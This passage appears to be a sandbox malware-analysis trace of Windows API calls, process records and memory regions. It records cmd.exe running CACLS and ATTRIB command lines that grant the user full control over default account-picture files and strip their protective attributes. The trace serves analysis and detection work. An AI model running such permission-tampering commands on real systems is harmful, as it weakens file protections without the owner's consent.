FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x20efb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0x28e4d8 [0186.064] FindClose (in: hFindFile=0x28e4d8 | out: hFindFile=0x28e4d8) returned 1 [0186.064] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x20efb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0xffffffff [0186.065] GetLastError () returned 0x2 [0186.065] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x20efb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20efb0) returned 0x28e4d8 [0186.065] FindClose (in: hFindFile=0x28e4d8 | out: hFindFile=0x28e4d8) returned 1 [0186.065] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0186.065] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0186.065] GetConsoleTitleW (in: lpConsoleTitle=0x20f4a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.065] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f330, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f3f8 | out: lpAttributeList=0x20f330, lpSize=0x20f3f8) returned 1 [0186.065] UpdateProcThreadAttribute (in: lpAttributeList=0x20f330, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f3f0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f330, lpPreviousValue=0x0) returned 1 [0186.065] GetStartupInfoW (in: lpStartupInfo=0x20f2ec | out: lpStartupInfo=0x20f2ec*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0186.065] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0186.065] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f38c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f3d8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\"", lpProcessInformation=0x20f3d8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xed4, dwThreadId=0x3c4)) returned 1 [0186.067] CloseHandle (hObject=0x50) returned 1 [0186.067] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0186.067] GetEnvironmentStringsW () returned 0x292410* [0186.067] FreeEnvironmentStringsW (penv=0x292410) returned 1 [0186.067] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0186.099] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x20f2cc | out: lpExitCode=0x20f2cc*=0x0) returned 1 [0186.099] CloseHandle (hObject=0x4c) returned 1 [0186.099] _vsnwprintf (in: _Buffer=0x20f414, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f2d8 | out: _Buffer="00000000") returned 8 [0186.099] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0186.099] GetEnvironmentStringsW () returned 0x292410* [0186.099] FreeEnvironmentStringsW (penv=0x292410) returned 1 [0186.099] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0186.100] GetEnvironmentStringsW () returned 0x292410* [0186.100] FreeEnvironmentStringsW (penv=0x292410) returned 1 [0186.100] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f330 | out: lpAttributeList=0x20f330) [0186.100] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.100] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0186.100] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.100] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0186.100] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.100] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0186.100] SetConsoleInputExeNameW () returned 0x1 [0186.100] GetConsoleOutputCP () returned 0x1b5 [0186.100] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.100] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.100] exit (_Code=0) Process: id = "380" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16ca0" os_pid = "0xee8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "379" os_parent_pid = "0xdac" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26657 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26658 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26659 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26660 start_va = 0x130000 end_va = 0x138fff entry_point = 0x130000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26661 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 26662 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26663 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26664 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26665 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 26666 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26667 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26668 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26669 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26670 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 26671 start_va = 0x270000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 26672 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26673 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26674 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26675 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26676 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26677 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26678 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 543 os_tid = 0xf04 Thread: id = 544 os_tid = 0xf10 Process: id = "381" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16ca0" os_pid = "0xed4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "379" os_parent_pid = "0xdac" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26679 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26680 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26681 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26682 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 26683 start_va = 0x890000 end_va = 0x896fff entry_point = 0x890000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 26684 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26685 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26686 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26687 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 26688 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26689 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26690 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26691 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26692 start_va = 0x110000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 26693 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 26694 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 26695 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26696 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26697 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26698 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26699 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26700 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26701 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26702 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26703 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26704 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26705 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26706 start_va = 0x1d0000 end_va = 0x297fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 26707 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26708 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 545 os_tid = 0x3c4 Process: id = "382" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0xf74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26709 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26710 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26711 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26712 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 26713 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26714 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26715 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26716 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26717 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 26718 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26719 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26720 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26721 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26722 start_va = 0x180000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 26723 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 26724 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26725 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26726 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26727 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26728 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26729 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26730 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26731 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26732 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26733 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 26734 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26735 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26736 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26737 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 26738 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 26739 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 26740 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 26741 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 26742 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 26743 start_va = 0x1380000 end_va = 0x164efff entry_point = 0x1380000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 546 os_tid = 0xf80 [0186.347] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afacc | out: lpSystemTimeAsFileTime=0x2afacc*(dwLowDateTime=0xa3f8f6c0, dwHighDateTime=0x1d440a9)) [0186.347] GetCurrentProcessId () returned 0xf74 [0186.347] GetCurrentThreadId () returned 0xf80 [0186.347] GetTickCount () returned 0x353d9 [0186.347] QueryPerformanceCounter (in: lpPerformanceCount=0x2afac4 | out: lpPerformanceCount=0x2afac4*=24313611302) returned 1 [0186.347] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0186.347] __set_app_type (_Type=0x1) [0186.347] __p__fmode () returned 0x76b331f4 [0186.348] __p__commode () returned 0x76b331fc [0186.348] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0186.348] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0186.348] GetCurrentThreadId () returned 0xf80 [0186.348] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf80) returned 0x38 [0186.348] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0186.348] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0186.348] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.348] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0186.348] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afa5c | out: phkResult=0x2afa5c*=0x0) returned 0x2 [0186.348] VirtualQuery (in: lpAddress=0x2afa93, lpBuffer=0x2afa2c, dwLength=0x1c | out: lpBuffer=0x2afa2c*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0186.348] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afa2c, dwLength=0x1c | out: lpBuffer=0x2afa2c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0186.348] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afa2c, dwLength=0x1c | out: lpBuffer=0x2afa2c*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0186.348] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afa2c, dwLength=0x1c | out: lpBuffer=0x2afa2c*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0186.348] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afa2c, dwLength=0x1c | out: lpBuffer=0x2afa2c*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0186.349] GetConsoleOutputCP () returned 0x1b5 [0186.349] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.349] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0186.349] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.349] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0186.349] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.349] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0186.349] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.349] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0186.349] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.349] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0186.349] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.349] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0186.350] GetEnvironmentStringsW () returned 0x410308* [0186.350] FreeEnvironmentStringsW (penv=0x410308) returned 1 [0186.350] GetEnvironmentStringsW () returned 0x410308* [0186.350] FreeEnvironmentStringsW (penv=0x410308) returned 1 [0186.350] RegOpenKeyExW (in: hKey=0x80000002, 